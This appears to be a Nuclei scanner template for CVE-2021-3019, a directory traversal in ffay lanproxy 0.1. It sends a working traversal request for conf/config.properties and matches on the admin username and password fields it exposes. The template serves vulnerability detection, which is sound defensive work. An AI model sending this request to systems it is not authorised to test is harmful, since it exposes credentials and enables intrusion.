id: CVE-2021-3019 info: name: ffay lanproxy Directory Traversal author: pikpikcu severity: high description: ffay lanproxy 0.1 is susceptible to a directory traversal vulnerability that could let attackers read /../conf/config.properties to obtain credentials for a connection to the intranet. reference: - https://github.com/ffay/lanproxy/commits/master - https://github.com/maybe-why-not/lanproxy/issues/1 - https://nvd.nist.gov/vuln/detail/CVE-2021-3019 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N cvss-score: 7.5 cve-id: CVE-2021-3019 cwe-id: CWE-22 tags: cve,cve2021,lanproxy,lfi requests: - method: GET path: - "{{BaseURL}}/../conf/config.properties" matchers-condition: and matchers: - type: status status: - 200 - type: word words: - "application/octet-stream" condition: and part: header - type: word words: - "config.admin.username" - "config.admin.password" condition: and part: body # Enhanced by mp on 2022/04/04